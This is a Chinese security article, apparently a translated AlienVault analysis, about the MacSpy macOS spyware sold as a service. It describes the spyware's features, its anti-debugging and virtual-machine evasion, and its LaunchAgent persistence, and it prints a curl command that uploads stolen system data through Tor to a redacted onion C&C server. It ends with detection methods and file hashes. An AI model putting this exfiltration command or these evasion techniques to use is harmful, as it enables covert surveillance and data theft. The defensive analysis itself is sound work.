解析间谍软件MacSpy 及其动向:开启“OS X RAT as a Service”模式

MacSpy 曾经被认为是“Mac平台上最复杂的间谍软件”,这款功能强大的恶意软件最近开始免费了。恶意软件即服务(malware-as-a-service ,MaaS)的浪潮,不仅使Tox 和 Shark 恶意软件家族趋之若鹜,MacSpy可以称得上是OS X平台上使用MAAS业务模式的先驱。

MacSpy的作者声称,近年来苹果产品越来越受欢迎,但是他们发现Mac平台上复杂的恶意软件数量极少,“人们需要能够在MacOS上运行的这类软件”,所以他们制作了MacSpy,并且推出了免费版本RAT,免费版本包含以下特征:

1.抵赖性

一旦安装,不会留下任何数字证据,使用Tor网络进行通信,安全、抗追踪;

2.捕获

每30秒进行一次截图,支持多显示器;

3.键盘记录

会记录每次键盘按键,日志输出格式化,清晰、直观(需要sudo权限);

4.云同步

只要iPhone与Mac通过iCloud同步信息,就可以获取到iPhone上的照片;

5.隐蔽性

在最低性能的MacBook Air上,本程序仅占用30M内存空间,cpu使用率低于01.%,用户基本上不会察觉到;

6.声音采集

会不停的记录主机周围的声音,即使用户关闭了麦克风;

7.剪贴板

可以获取到剪贴板的内容,这可以帮你获得任何你想要的东西,比如复杂的密码、服务器密钥等;

8.浏览器记录

可以获取并下载safari和chrome的浏览历史记录;

如果用户想要获得更多功能,可以支付一定的比特币购买付费版本,付费版本具有以下高级功能:

MacSpy的MaaS业务似乎还不够完善,我们没有看到供用户使用的自动化的签约服务。为了得到一份MacSpy,我们必须给作者发邮件,并告知我们的初始用户名和密码,以便可以得到一个供我们使用的账户。审核过我们提供的细节信息后,他们为我们创建了一个账号,回复的邮件中包含了软件下载和使用说明,如下图所示:

初步分析

解压后,我们观察到MacSpy包含了以下文件:

  • Mach-O 64-bit 可执行文件 “updated”
  • Mach-O 64-bit 可执行文件 “webkitproxy”
  • Mach-O 64-bit 动态链接共享库 “libevent-2.0.5.dylib”
  • 配置文件 “config”

对“webkitproxy” 和“libevent-2.0.5.dylib”文件进行检测,我们注意到他们使用了Tor 签名,可以推测出他们的功能与Tor 洋葱路由相关,配置文件的内容进一步确认了我们的怀疑是正确的。

配置文件的内容

“updated” 文件没有经过数字签名,而且目前为止它完全没有被各种AV公司标识,VirusTotal上检测结果如下:

反调试的策略

MacSpy使用了几个策略,用来阻碍对它的分析。为了防止调试,它使用了ptrace()函数的PT_DENY_ATTACH 选项,这是一种常见的IOS反调试方式。

如果绕过了ptrace策略,MacSpy还有其他的代码用来检测程序是否在调试器中运行:

上边的代码与一个Stack Overflow上贴出来的tui调试器检查代码非常相似,链接(https://stackoverflow.com/questions/4744826/detecting-if-ios-app-is-run-in-debugger ),关键代码如下图所示:

除了反调试策略之外,MacSpy还会对其执行环境进行检查,使其很难在虚拟机中运行。下边的代码中,你将看到MacSpy会检查如下参数和属性值:物理CPU数量是否大于1;逻辑内核数是否大于3;逻辑内核数是否是物理内核数的两倍;主机上的内存是否大于4GB(因为沙盒经常使用最少的资源检测恶意软件),这些检查可以防止MacSpy在虚拟环境中被执行。

与MacRansom 勒索软件相似,MacSpy 也会使用“sysctl”命令来过滤“Mac”机器型号。MacSpy会杀掉所有的windows终端窗口以逃避分析师常用的一些恶意软件分析工具。

持久性

为了确保可以持续不断的监控系统,恶意软件创建了一个启动条目:~/Library/LaunchAgents/com.apple.webkit.plist,确保恶意软件在计算机启动时被运行,持续的完成信息收集的任务。


行为分析

恶意软件执行时,首先会确保“反调试”检查顺利通过,并实施“持久性”的相关操作。然而,恶意软件会复制自身和原始执行点相关的文件到  “~/Library/.DS_Stores/“目录下,并删除原始文件达到隐藏的目的。之后,恶意软件通过curl 命令与C&C服务器进行通信,用以检测其 Tor代理的功能。与C&C服务器连通之后,恶意软件通过Tor代理发送POST请求,将之前收集到的系统信息之类的数据发送给C&C服务器。这个过程会再次重复,因为恶意软件会一直不停的收集各种数据。将这些收集到的数据成功传送到C&C服务器后,恶意软件会删除包含发送数据的临时文件。

发送数据的curl命令,示例如下:

/usr/bin/curl –fail -m 25 –socks5-hostname 127.0.0.1:47905 -ks -X POST -H key:<KEY> -H type:system -H Content-Type:multipart/form-data -F system=@’/Users/<USER>/Library/.DS_Stores/data/tmp/SystemInfo’ http://<redacted>.onion/upload

~/Library/.DS_Stores/data/tmp/SystemInfo 文件的内容,示例如下:

用户门户网站

最初和恶意软件制作者通信时,我们发送了一组账号密码,希望可以在他们的门户网站上使用。登录到MacSpy的门户网站后,你会看到一个很简陋的包含文件夹的目录列表,目录以YYYYMM格式标识出了恶意软件在系统执行的最新日期,文件夹则以DD格式显示更新日期。进入文件夹内部,你会看到一系列目录,这些目录的命名与受害者系统目录名称相似,文件夹里面都是从受害者那里收集到的数据。

检测

网络入侵检测系统

使用网络入侵检测系统(NIDS)规则MacSpy的通信进行检测,是检测Mac上是否运行MacSpy的最好方式。AlienVault提供了这个威胁的检测规则,这一规则被称为“System Compromise, Malware RAT, MacSpy”。通过触发USM相关引擎的报警信息,向用户提醒其系统可能被感染了。

Osquery

*osquery 一款由facebook开源的,面向OSX和Linux的操作系统检测框架

Yara

还可以在任何支持Yara的平台上运行以下规则,以检测Mac平台上的恶意软件:

*Yara是一款用于识别和分类恶意软件样本的开源工具。

结论

人们普遍认为,Mac电脑比较安全,可以免受恶意软件的攻击,这曾经是一个普遍的、真实的观点,但是现在这个说法越来越不真实了,试试证明已经有了越来越多的针对Mac的恶意软件。虽然MacSpy可能不是最隐秘的,但是它的功能极其丰富。它的发展也充分表明了随着OS X市场份额的逐步扩大,可以预想到将会有更多的恶意软件制作者投入更多的时间制作针对Mac平台的恶意软件。

IoC

附录(FileHash-MD5    )

6c03e4a9bcb9afaedb7451a33c214ae4
c72de549a1e72cfff928e8d2591d7e97
cc07ab42070922b760b6bf9f894d0290
27056cabd185e939195d1aaa2aa1030f
f38977a34b1f6d8592fa17fafdb76c59

参考来源:alienvault,转载请注明来自MottoIN

原创文章,作者:M0tto1n,如若转载,请注明出处:http://www.mottoin.com/102898.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code